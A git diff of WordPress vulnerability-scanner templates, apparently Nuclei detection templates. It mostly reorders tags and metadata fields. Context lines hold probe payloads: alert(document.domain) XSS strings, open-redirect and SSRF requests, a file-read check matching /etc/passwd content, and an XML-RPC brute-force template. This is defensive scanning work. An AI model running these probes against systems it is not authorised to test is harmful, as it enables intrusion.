9a891fcae4..a1c272d619 100644 --- a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wordpress,xss,wp-plugin,edb metadata: max-request: 1 + tags: wordpress,xss,wp-plugin,edb http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml b/http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml index 6c209d71aa..5c7a878ae3 100644 --- a/http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml +++ b/http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml @@ -7,9 +7,9 @@ info: reference: - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files - https://core.trac.wordpress.org/ticket/38317 - tags: debug,wordpress,fpd metadata: max-request: 1 + tags: debug,wordpress,fpd http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml index bec34067cb..4d6d709c72 100644 --- a/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: wp-theme,redirect,wpscan,wordpress metadata: max-request: 1 + tags: wp-theme,redirect,wpscan,wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml index 330aec51d6..058fa455f3 100644 --- a/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-gtranslate-open-redirect.yaml @@ -11,14 +11,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: redirect,wordpress metadata: max-request: 1 + tags: redirect,wordpress http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com' + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wp-haberadam-idor.yaml b/http/vulnerabilities/wordpress/wp-haberadam-idor.yaml index 9ecbb9f16c..fe24026d9c 100644 --- a/http/vulnerabilities/wordpress/wp-haberadam-idor.yaml +++ b/http/vulnerabilities/wordpress/wp-haberadam-idor.yaml @@ -18,6 +18,7 @@ http: - '{{BaseURL}}/blog/wp-content/themes/haberadam/api/mobile-info.php?id=' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml b/http/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml index e02472e1b1..c9f9388a4f 100644 --- a/http/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml @@ -7,18 +7,16 @@ info: description: Searches for sensitive directories present in the idx-broker-platinum plugin. reference: - https://www.exploit-db.com/ghdb/6416 - tags: plugin,edb,wordpress,listing metadata: max-request: 1 + tags: plugin,edb,wordpress,listing http: - - method: GET path: - "{{BaseURL}}/wp-content/plugins/idx-broker-platinum/" matchers-condition: and - matchers: - type: word words: diff --git a/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml b/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml index ef862de1a8..9b9336c20f 100644 --- a/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-insert-php-xss.yaml @@ -12,8 +12,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 2 verified: true + max-request: 2 tags: xss,wp,wordpress,authenticated,woody,wpscan,wp-plugin http: @@ -26,12 +26,12 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/edit.php?post_type=wbcr-snippets&page=import-wbcr_insert_php&a"> HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wp-iwp-client-listing.yaml b/http/vulnerabilities/wordpress/wp-iwp-client-listing.yaml index 84f9014871..ec008ee643 100644 --- a/http/vulnerabilities/wordpress/wp-iwp-client-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-iwp-client-listing.yaml @@ -7,9 +7,9 @@ info: description: Searches for sensitive directories present in the iwp-client plugin. reference: - https://www.exploit-db.com/ghdb/6427 - tags: wordpress,listing,plugin,edb metadata: max-request: 1 + tags: wordpress,listing,plugin,edb http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml b/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml index 86148f1ab5..c1795de71f 100644 --- a/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-javospot-lfi.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-theme,lfi,wp,wpscan metadata: max-request: 1 + tags: wordpress,wp-theme,lfi,wp,wpscan http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-knews-xss.yaml b/http/vulnerabilities/wordpress/wp-knews-xss.yaml index cb03205940..29b93fce98 100644 --- a/http/vulnerabilities/wordpress/wp-knews-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-knews-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wordpress,xss,wp-plugin metadata: max-request: 1 + tags: wordpress,xss,wp-plugin http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-license-file.yaml b/http/vulnerabilities/wordpress/wp-license-file.yaml index ffb6a29110..84642a6db0 100644 --- a/http/vulnerabilities/wordpress/wp-license-file.yaml +++ b/http/vulnerabilities/wordpress/wp-license-file.yaml @@ -4,9 +4,9 @@ info: name: WordPress license file disclosure author: yashgoti severity: info - tags: wordpress metadata: max-request: 1 + tags: wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml b/http/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml index 9d57d9e2a2..2ad6d0c465 100644 --- a/http/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml +++ b/http/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml @@ -5,9 +5,9 @@ info: author: aashiq severity: medium description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content - tags: logs,wordpress,exposure,mailchimp metadata: max-request: 1 + tags: logs,wordpress,exposure,mailchimp http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml b/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml index 6cbde23eab..0f8b670497 100644 --- a/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wpscan,wordpress,wp-plugin,lfi,edb metadata: max-request: 2 + tags: wpscan,wordpress,wp-plugin,lfi,edb http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index 41d763b574..0ecffdbbb2 100644 --- a/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-94 - tags: wordpress,rce,ssrf,edb,wpscan metadata: max-request: 1 + tags: wordpress,rce,ssrf,edb,wpscan http: - raw: diff --git a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml index 65a6bb5ef1..7c36a2412e 100644 --- a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wp-plugin,edb,wordpress,xss metadata: max-request: 1 + tags: wp-plugin,edb,wordpress,xss http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml index 1b5a607412..3c2bc8d98e 100644 --- a/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-theme,lfi metadata: max-request: 1 + tags: wordpress,wp-theme,lfi http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml index b4264981cc..296cef33a0 100644 --- a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,wp-plugin,edb,wordpress metadata: max-request: 1 + tags: xss,wp-plugin,edb,wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml b/http/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml index 28549464dc..447d7b5a75 100644 --- a/http/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml @@ -6,9 +6,9 @@ info: severity: info description: Searches for sensitive directories present in the 1-flash-gallery plugin. reference: https://www.exploit-db.com/ghdb/6978 - tags: wordpress,listing metadata: max-request: 2 + tags: wordpress,listing http: - method: GET @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/blog/wp-content/plugins/1-flash-gallery/" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml b/http/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml index 44ae794ad3..bb342f4314 100644 --- a/http/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml +++ b/http/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml @@ -7,14 +7,15 @@ info: description: Searches for sensitive directories present in the lifterlms plugin. reference: - https://www.exploit-db.com/ghdb/6420 - tags: wordpress,listing,plugin,edb metadata: max-request: 1 + tags: wordpress,listing,plugin,edb http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/lifterlms/" + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml b/http/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml index 98c116cf30..b0121165dd 100644 --- a/http/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml +++ b/http/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml @@ -7,9 +7,9 @@ info: description: Searches for sensitive directories present in the ultimate-member plugin. reference: - https://www.exploit-db.com/ghdb/6998 - tags: wordpress,listing,plugin,edb metadata: max-request: 1 + tags: wordpress,listing,plugin,edb http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-popup-listing.yaml b/http/vulnerabilities/wordpress/wp-popup-listing.yaml index 05434046e7..cd7deae874 100644 --- a/http/vulnerabilities/wordpress/wp-popup-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-popup-listing.yaml @@ -5,9 +5,9 @@ info: author: aashiq severity: info description: Searches for sensitive directories present in the wordpress-popup plugin. - tags: wordpress,listing,plugin metadata: max-request: 1 + tags: wordpress,listing,plugin http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml index c1c827604a..9a82cbc216 100644 --- a/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml @@ -7,9 +7,9 @@ info: description: WordPress ProStore theme before 1.1.3 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc - tags: wordpress,wp-theme,redirect,wpscan metadata: max-request: 1 + tags: wordpress,wp-theme,redirect,wpscan http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-qards-listing.yaml b/http/vulnerabilities/wordpress/wp-qards-listing.yaml index 2e95313ed3..0b0b9b714d 100644 --- a/http/vulnerabilities/wordpress/wp-qards-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-qards-listing.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the qards plugin. - tags: wordpress,listing,wp-plugin,wp metadata: max-request: 1 + tags: wordpress,listing,wp-plugin,wp http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml b/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml index 71d3e03442..bd1976ace4 100644 --- a/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml @@ -15,10 +15,10 @@ info: cvss-score: 6.1 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 publicwww-query: "/wp-content/themes/realestate-7/" - tags: wordpress,wp-theme,wp,xss,realestate + tags: packetstorm,wordpress,wp-theme,wp,xss,realestate http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-related-post-xss.yaml b/http/vulnerabilities/wordpress/wp-related-post-xss.yaml index b1d1f51a14..942bf24b0d 100644 --- a/http/vulnerabilities/wordpress/wp-related-post-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-related-post-xss.yaml @@ -10,8 +10,8 @@ info: - https://huntr.dev/bounties/7c9bd2d2-2a6f-420c-a45e-716600cf810e/ - https://wordpress.org/plugins/wordpress-23-related-posts-plugin/advanced/ metadata: - max-request: 2 verified: true + max-request: 2 tags: wp-plugin,xss,relatedposts,authenticated,huntr,wordpress,wp http: @@ -22,12 +22,12 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml index c578306a64..d7c0c84904 100644 --- a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: edb,wordpress,xss,wp-plugin metadata: max-request: 1 + tags: edb,wordpress,xss,wp-plugin http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml b/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml index e0b994f017..a0ead0e7d0 100644 --- a/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-security-open-redirect.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cwe-id: CWE-601 metadata: - max-request: 1 verified: true + max-request: 1 tags: wp-plugin,redirect,wordpress,wp,wpscan http: diff --git a/http/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml b/http/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml index ce77e1bdbb..5cd227a99c 100644 --- a/http/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-sfwd-lms-listing.yaml @@ -7,9 +7,9 @@ info: description: Searches for sensitive directories present in the sfwd-lms plugin. reference: - https://www.exploit-db.com/ghdb/6426 - tags: wordpress,listing,plugin,edb metadata: max-request: 1 + tags: wordpress,listing,plugin,edb http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml b/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml index f2d6c00397..afb65c3bf3 100644 --- a/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml @@ -7,9 +7,9 @@ info: description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution. reference: - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html - tags: wp-plugin,lfi,packetstorm,wordpress metadata: max-request: 1 + tags: wp-plugin,lfi,packetstorm,wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml index 063a1ad38a..7ac448a1f6 100644 --- a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml @@ -11,17 +11,17 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wordpress,xss,wp-plugin,edb metadata: max-request: 1 + tags: wordpress,xss,wp-plugin,edb http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' matchers-condition: and matchers: diff --git a/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml b/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml index 4ee01a0970..d80c52a791 100644 --- a/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-socialfit-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 publicwww-query: "/wp-content/plugins/socialfit" tags: wordpress,wp,xss,wp-plugin,edb @@ -44,4 +44,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml b/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml index 4c52537f27..a8b765f0b1 100644 --- a/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml @@ -8,9 +8,9 @@ info: reference: - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/ - tags: wordpress,backup,wpscan metadata: max-request: 1 + tags: wordpress,backup,wpscan http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-super-forms.yaml b/http/vulnerabilities/wordpress/wp-super-forms.yaml index 3e572dce3f..75729ac5e2 100644 --- a/http/vulnerabilities/wordpress/wp-super-forms.yaml +++ b/http/vulnerabilities/wordpress/wp-super-forms.yaml @@ -7,14 +7,15 @@ info: description: Searches for sensitive directories present in the super-forms plugin. reference: - https://www.exploit-db.com/ghdb/6776 - tags: listing,plugin,edb,wordpress metadata: max-request: 1 + tags: listing,plugin,edb,wordpress http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/super-forms/" + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wp-sym404.yaml b/http/vulnerabilities/wordpress/wp-sym404.yaml index 8a8f4a846f..d6fd47132f 100644 --- a/http/vulnerabilities/wordpress/wp-sym404.yaml +++ b/http/vulnerabilities/wordpress/wp-sym404.yaml @@ -8,8 +8,8 @@ info: reference: - https://twitter.com/momika233/status/1540325055280070656 metadata: - max-request: 1 verified: true + max-request: 1 google-query: inurl:"/wp-includes/sym404/" tags: wordpress,listing,wp,exposure diff --git a/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml b/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml index 7c4770847c..f59ef7c84a 100644 --- a/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-theme,lfi,wordpress,tinymce metadata: max-request: 1 + tags: wordpress,wp-theme,lfi,wordpress,tinymce http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-touch-redirect.yaml b/http/vulnerabilities/wordpress/wp-touch-redirect.yaml index 26b86d8e3f..e4c7d62d28 100644 --- a/http/vulnerabilities/wordpress/wp-touch-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-touch-redirect.yaml @@ -9,8 +9,8 @@ info: reference: - https://packetstormsecurity.com/files/170568/WordPress-WPtouch-3.7.5-Open-Redirection.html metadata: - max-request: 1 verified: true + max-request: 1 google-query: "inurl:/wp-content/plugins/wptouch" tags: wp-plugin,wp,packetstorm,wptouch,unauth,redirect,wordpress diff --git a/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml b/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml index 55b1c200a3..82d365e955 100644 --- a/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-tutor-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,edb metadata: max-request: 1 + tags: wordpress,wp-plugin,lfi,edb http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml index 9e93ee63c6..8e3b10eaf9 100644 --- a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml +++ b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml @@ -10,8 +10,8 @@ info: - https://wpscan.com/vulnerability/24784c84-3efd-4166-81c1-e5a266562cfc - https://packetstormsecurity.com/files/161576/ metadata: - max-request: 1 verified: true + max-request: 1 tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm http: diff --git a/http/vulnerabilities/wordpress/wp-upload-data.yaml b/http/vulnerabilities/wordpress/wp-upload-data.yaml index ef0c5ee5aa..16f4b3174e 100644 --- a/http/vulnerabilities/wordpress/wp-upload-data.yaml +++ b/http/vulnerabilities/wordpress/wp-upload-data.yaml @@ -6,9 +6,9 @@ info: severity: medium description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it. reference: https://www.exploit-db.com/ghdb/7040 - tags: wordpress,listing metadata: max-request: 1 + tags: wordpress,listing http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-vault-lfi.yaml b/http/vulnerabilities/wordpress/wp-vault-lfi.yaml index 351a796f38..5b608ac85d 100644 --- a/http/vulnerabilities/wordpress/wp-vault-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-vault-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,edb,wp-plugin,wordpress metadata: max-request: 1 + tags: lfi,edb,wp-plugin,wordpress http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml b/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml index 75a6be6b79..74c5f8e588 100644 --- a/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml +++ b/http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml @@ -11,11 +11,11 @@ info: - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8 classification: cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-288 - tags: woocommerce,wp,wpscan,wordpress,wp-plugin metadata: max-request: 2 + tags: woocommerce,wp,wpscan,wordpress,wp-plugin http: - method: GET @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml b/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml index 3e65cfc1ae..df2866a7e7 100644 --- a/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml +++ b/http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: wordpress,woocommerce,lfi,wp-plugin,wp metadata: max-request: 1 + tags: wordpress,woocommerce,lfi,wp-plugin,wp http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml index 27b6eb9fbc..c1038ceafe 100644 --- a/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml @@ -5,20 +5,19 @@ info: author: mohammedsaneem,sec_hawk severity: medium description: A vulnerability in Woocommerce allows remote unauthenticated attackers to access company invoices and other sensitive information. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 reference: - https://twitter.com/sec_hawk/status/1426984595094913025?s=21 - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml - https://woocommerce.com/products/pdf-invoices/ - tags: wordpress,listing,exposure,woocommerce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 metadata: max-request: 1 + tags: wordpress,listing,exposure,woocommerce http: - - method: GET path: - "{{BaseURL}}/wp-content/uploads/pdf-invoices/" diff --git a/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml b/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml index 7b9238627d..f39a99706c 100644 --- a/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml +++ b/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml @@ -8,9 +8,9 @@ info: reference: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ - tags: wordpress,php,xmlrpc,fuzz metadata: max-request: 276 + tags: wordpress,php,xmlrpc,fuzz http: - raw: diff --git 